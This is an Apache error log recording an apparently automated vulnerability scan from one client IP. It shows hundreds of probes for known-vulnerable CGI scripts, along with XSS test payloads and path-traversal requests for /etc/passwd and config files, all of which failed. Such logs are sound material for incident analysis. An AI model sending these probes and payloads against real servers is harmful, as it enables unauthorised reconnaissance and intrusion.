[Wed Sep 29 21:34:40.271032 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/listrec.pl
[Wed Sep 29 21:34:40.442632 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/mailnews.cgi
[Wed Sep 29 21:34:40.598632 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/mmstdod.cgi
[Wed Sep 29 21:34:40.723432 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/pagelog.cgi
[Wed Sep 29 21:34:41.113433 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/perl
[Wed Sep 29 21:34:41.240233 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/perl.exe
[Wed Sep 29 21:34:41.352835 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/perl.exe
[Wed Sep 29 21:34:41.462035 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/perl
[Wed Sep 29 21:34:41.586835 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/plusmail
[Wed Sep 29 21:34:41.696035 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/scripts
[Wed Sep 29 21:34:41.805235 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/scripts
[Wed Sep 29 21:34:41.930036 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/smartsearch.cgi
[Wed Sep 29 21:34:42.101636 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/smartsearch
[Wed Sep 29 21:34:42.288836 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/spin_client.cgi
[Wed Sep 29 21:34:42.398036 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/sscd_suncourier.pl
[Wed Sep 29 21:34:42.507237 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/viralator.cgi
[Wed Sep 29 21:34:42.663237 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/virgil.cgi
[Wed Sep 29 21:34:42.803637 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/vpasswd.cgi
[Wed Sep 29 21:34:42.928437 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/webgais
[Wed Sep 29 21:34:43.068838 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/websendmail
[Wed Sep 29 21:34:43.178038 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/whois.cgi
[Wed Sep 29 21:34:43.334038 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/wwwwais
[Wed Sep 29 21:34:43.646039 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Wed Sep 29 21:34:43.817639 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/handler
[Wed Sep 29 21:34:43.926839 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/handler
[Wed Sep 29 21:34:44.145240 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/webdist.cgi
[Wed Sep 29 21:34:44.816041 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/stat.pl
[Wed Sep 29 21:34:44.956441 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/cachemgr.cgi
[Wed Sep 29 21:34:45.065641 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/ppdscgi.exe
[Wed Sep 29 21:34:45.174841 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/sws
[Wed Sep 29 21:34:45.299642 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/webif.cgi
[Wed Sep 29 21:34:45.970443 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/.cobalt
[Wed Sep 29 21:34:46.313643 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/webdriver
[Wed Sep 29 21:34:46.547644 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/c32web.exe
[Wed Sep 29 21:34:46.766044 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/cgi-lib.pl
[Wed Sep 29 21:34:46.890844 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/log
[Wed Sep 29 21:34:47.000045 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/mini_logger.cgi
[Wed Sep 29 21:34:47.109245 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/mt-static
[Wed Sep 29 21:34:47.218445 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/mt
[Wed Sep 29 21:34:47.343245 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/nimages.php
[Wed Sep 29 21:34:47.452445 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/robadmin.cgi
[Wed Sep 29 21:34:47.670846 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/netpad.cgi
[Wed Sep 29 21:34:47.795646 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/troops.cgi
[Wed Sep 29 21:34:47.982846 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/unlg1.1
[Wed Sep 29 21:34:48.232447 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/unlg1.2
[Wed Sep 29 21:34:48.341647 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/rwwwshell.pl
[Wed Sep 29 21:34:48.684848 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/cgi-bin/photo
[Wed Sep 29 21:34:56.765662 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35042] script not found or unable to stat: E:/nuevo/htdocs/shopadmin.asp
[Wed Sep 29 21:34:57.093262 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35042] AH00127: Cannot map GET /<script>alert('Vulnerable')</script> HTTP/1.1 to file
[Wed Sep 29 21:36:22.537613 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35058] script not found or unable to stat: E:/nuevo/cgi-bin/blog
[Wed Sep 29 21:36:23.270814 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35058] AH01630: client denied by server configuration: E:/nuevo/webalizer/
[Wed Sep 29 21:36:26.515620 2021] [core:error] [pid 10816:tid 21000] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35058] AH00127: Cannot map GET /\\"><img%20src=\\"javascript:alert(document.domain)\\"> HTTP/1.1 to file
[Wed Sep 29 21:36:28.028822 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35058] AH00126: Invalid URI in request GET /file/../../../../../../../../etc/ HTTP/1.1
[Wed Sep 29 21:36:41.508246 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:36:41.508246 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35060] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:36:42.319447 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] attempt to invoke directory as script: E:/nuevo/cgi-bin/
[Wed Sep 29 21:36:42.662648 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/ccbill-local.pl
[Wed Sep 29 21:36:42.787448 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/ccbill-local.cgi
[Wed Sep 29 21:36:42.943448 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/mastergate
[Wed Sep 29 21:36:43.052649 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/Backup
[Wed Sep 29 21:36:43.177449 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/sendpage.pl
[Wed Sep 29 21:36:43.286649 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/gbook
[Wed Sep 29 21:36:43.411449 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/bslist.cgi
[Wed Sep 29 21:36:43.536249 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/bsguest.cgi
[Wed Sep 29 21:36:43.645450 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/nbmember.cgi
[Wed Sep 29 21:36:44.113450 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/where.pl
[Wed Sep 29 21:36:44.238251 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] attempt to invoke directory as script: E:/nuevo/cgi-bin/
[Wed Sep 29 21:36:54.019468 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/phf
[Wed Sep 29 21:36:54.128668 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/phf
[Wed Sep 29 21:36:54.253468 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/phf.cgi
[Wed Sep 29 21:36:54.393869 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/phf
[Wed Sep 29 21:36:54.518669 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/upload.cgi
[Wed Sep 29 21:36:54.768269 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] AH01630: client denied by server configuration: E:/nuevo/htdocs/server-status
[Wed Sep 29 21:36:55.345470 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/nph-publish.cgi
[Wed Sep 29 21:36:55.454670 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/nph-test-cgi
[Wed Sep 29 21:36:55.563871 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/pfdisplay.cgi
[Wed Sep 29 21:36:55.704271 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/pfdispaly.cgi
[Wed Sep 29 21:36:55.813471 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/pfdispaly.cgi
[Wed Sep 29 21:36:55.922671 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/pfdisplay.cgi
[Wed Sep 29 21:36:56.265872 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] script not found or unable to stat: E:/nuevo/cgi-bin/webcart
[Wed Sep 29 21:36:56.375072 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35062] AH00126: Invalid URI in request GET /../webserver.ini HTTP/1.1
[Wed Sep 29 21:36:59.807078 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35064] script not found or unable to stat: E:/nuevo/htdocs/shopexd.asp
[Wed Sep 29 21:37:01.554281 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35064] script not found or unable to stat: E:/nuevo/cgi-bin/photo
[Wed Sep 29 21:37:02.381083 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35064] script not found or unable to stat: E:/nuevo/cgi-bin/include
[Wed Sep 29 21:37:02.505883 2021] [core:error] [pid 10816:tid 21000] (20025)The given path contained wildcard characters: [client 65.94.34.16:35064] AH00036: access to /?.jsp failed (filesystem path 'E:/nuevo/htdocs/?.jsp')
[Wed Sep 29 21:37:02.630683 2021] [core:error] [pid 10816:tid 21000] (20025)The given path contained wildcard characters: [client 65.94.34.16:35064] AH00036: access to /?.jsp failed (filesystem path 'E:/nuevo/htdocs/?.jsp')
[Wed Sep 29 21:37:02.880283 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35064] AH00126: Invalid URI in request GET ../../../../../../../../../../etc/* HTTP/1.1
[Wed Sep 29 21:37:03.083084 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35066] AH00126: Invalid URI in request GET ../../../../../../../../../../etc/passw* HTTP/1.1
[Wed Sep 29 21:37:03.551085 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35068] script not found or unable to stat: E:/nuevo/htdocs/musicqueue.cgi
[Wed Sep 29 21:37:03.675885 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35068] script not found or unable to stat: E:/nuevo/cgi-bin/musicqueue.cgi
[Wed Sep 29 21:37:04.019085 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35068] script not found or unable to stat: E:/nuevo/cgi-bin/windmail
[Wed Sep 29 21:37:04.143886 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35068] script not found or unable to stat: E:/nuevo/cgi-bin/windmail.exe
[Wed Sep 29 21:37:04.253086 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35068] script not found or unable to stat: E:/nuevo/cgi-bin/WINDMAIL.EXE
[Wed Sep 29 21:37:04.471486 2021] [core:error] [pid 10816:tid 21000] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35068] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1 to file
[Wed Sep 29 21:37:04.596286 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35068] script not found or unable to stat: E:/nuevo/cgi-bin/dose.pl
[Wed Sep 29 21:37:04.830287 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35068] AH00126: Invalid URI in request GET /../config.dat HTTP/1.1
[Wed Sep 29 21:37:05.719488 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/gbadmin.cgi
[Wed Sep 29 21:37:05.828689 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/gbadmin.cgi
[Wed Sep 29 21:37:05.937889 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/gbadmin.cgi
[Wed Sep 29 21:37:06.062689 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/gbadmin.cgi
[Wed Sep 29 21:37:06.171889 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/gbpass.pl
[Wed Sep 29 21:37:06.390290 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/shopdisplayproducts.asp
[Wed Sep 29 21:37:06.858290 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/showmail.pl
[Wed Sep 29 21:37:06.967491 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/reademail.pl
[Wed Sep 29 21:37:07.076691 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/showmail.pl
[Wed Sep 29 21:37:07.872292 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/addalink.cgi
[Wed Sep 29 21:37:07.981492 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cgiecho
[Wed Sep 29 21:37:08.090693 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cgiemail
[Wed Sep 29 21:37:08.199893 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/countedit
[Wed Sep 29 21:37:08.309093 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/domainredirect.cgi
[Wed Sep 29 21:37:08.433893 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/entropybanner.cgi
[Wed Sep 29 21:37:08.543093 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/entropysearch.cgi
[Wed Sep 29 21:37:08.652294 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/FormMail-clone.cgi
[Wed Sep 29 21:37:08.777094 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/helpdesk.cgi
[Wed Sep 29 21:37:08.886294 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/mchat.cgi
[Wed Sep 29 21:37:08.995494 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/randhtml.cgi
[Wed Sep 29 21:37:09.120294 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/realhelpdesk.cgi
[Wed Sep 29 21:37:09.229495 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/realsignup.cgi
[Wed Sep 29 21:37:09.338695 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/scgiwrap
[Wed Sep 29 21:37:09.447895 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/signup.cgi
[Wed Sep 29 21:37:09.791096 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/GW5
[Wed Sep 29 21:37:18.605111 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/dbmlparser.exe
[Wed Sep 29 21:37:43.815755 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Wed Sep 29 21:37:44.080956 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/changelog.php
[Wed Sep 29 21:37:44.408556 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Wed Sep 29 21:37:44.642557 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/ChangeLog
[Wed Sep 29 21:38:03.424990 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/.fhp
[Wed Sep 29 21:38:03.534190 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/add_ftp.cgi
[Wed Sep 29 21:38:03.705790 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/admin.cgi
[Wed Sep 29 21:38:03.814991 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/admin.php
[Wed Sep 29 21:38:04.002191 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/admin.php3
[Wed Sep 29 21:38:04.126991 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/admin.pl
[Wed Sep 29 21:38:04.282991 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/adminhot.cgi
[Wed Sep 29 21:38:04.470192 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/adminwww.cgi
[Wed Sep 29 21:38:04.594992 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/AnyBoard.cgi
[Wed Sep 29 21:38:04.782192 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/AnyForm
[Wed Sep 29 21:38:04.891392 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/AnyForm2
[Wed Sep 29 21:38:05.078593 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ash
[Wed Sep 29 21:38:05.187793 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ax-admin.cgi
[Wed Sep 29 21:38:05.296993 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ax.cgi
[Wed Sep 29 21:38:05.406193 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/axs.cgi
[Wed Sep 29 21:38:05.515394 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bash
[Wed Sep 29 21:38:05.624594 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bnbform
[Wed Sep 29 21:38:05.733794 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bnbform.cgi
[Wed Sep 29 21:38:05.842994 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cart.pl
[Wed Sep 29 21:38:05.967794 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cgimail.exe
[Wed Sep 29 21:38:06.076994 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/classifieds
[Wed Sep 29 21:38:06.201795 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/classifieds.cgi
[Wed Sep 29 21:38:06.326595 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/clickcount.pl
[Wed Sep 29 21:38:06.435795 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/code.php
[Wed Sep 29 21:38:06.560595 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/code.php3
[Wed Sep 29 21:38:06.716596 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/count.cgi
[Wed Sep 29 21:38:06.825796 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/csh
[Wed Sep 29 21:38:06.934996 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cstat.pl
[Wed Sep 29 21:38:07.059796 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/c_download.cgi
[Wed Sep 29 21:38:07.184596 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/dasp
[Wed Sep 29 21:38:07.293797 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/day5datacopier.cgi
[Wed Sep 29 21:38:07.402997 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/dfire.cgi
[Wed Sep 29 21:38:07.527797 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/dig.cgi
[Wed Sep 29 21:38:07.636997 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/displayTC.pl
[Wed Sep 29 21:38:07.792998 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/edit.pl
[Wed Sep 29 21:38:07.917798 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/enter.cgi
[Wed Sep 29 21:38:08.026998 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/environ.cgi
[Wed Sep 29 21:38:08.136198 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/environ.pl
[Wed Sep 29 21:38:08.260998 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ex-logger.pl
[Wed Sep 29 21:38:08.385799 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/excite
[Wed Sep 29 21:38:08.494999 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/filemail
[Wed Sep 29 21:38:08.604199 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/filemail.pl
